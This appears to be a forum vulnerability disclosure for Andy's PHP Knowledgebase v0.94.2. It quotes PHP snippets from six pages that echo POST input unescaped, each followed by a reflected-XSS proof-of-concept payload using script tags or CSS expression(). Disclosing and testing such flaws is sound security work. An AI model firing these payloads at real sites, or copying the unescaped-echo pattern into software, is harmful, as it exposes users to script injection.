Andy's PHP Knowledgebase v0.94.2
http://aphpkb.org/
forgot_password.php
PHP код:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/forgot_password.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
keysearch.php
PHP код:
if($_REQUEST['keyword_list']){
$keyword_list = escdata($_REQUEST['keyword_list']);
} else {
$keyword_list = 'nothing';
}
...
// If it's not the first page, make a Previous button.
if ($current_page != 1) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> ';
}
// Make all the numbered pages.
for ($i = 1; $i <= $num_pages; $i++) {
if ($i != $current_page) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> ';
} else {
echo $i . ' ';
}
}
// If it's not the last page, make a Next button.
if ($current_page != $num_pages) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>';
}
pXSS
http://localhost/aphpkb/keysearch.php
post keyword_list=1<script>alert(121212)</script>
-------------------------------------------------------------
login.php
PHP код:
<p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/login.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
q.php
PHP код:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
echo "<p>Question:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/q.php
post article=1<div+style+STYLE="width:expression(alert( 121212))%3B">&aid=111&submit=Submit%20Question
-------------------------------------------------------------
register.php
PHP код:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p>
<p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p>
<p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p>
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p>
pXSS
http://localhost/aphpkb/register.php
post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script
post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script>
post email=1>"><script%20%0a%0d>alert(121212)%3B</script>
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
saa.php
PHP код:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
if($titlee) { echo "<p>Title: $titlee</p>"; }
echo "<p>Article:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/saa.php
post article=1<div+style="width:expression(alert(121212 ))%3B">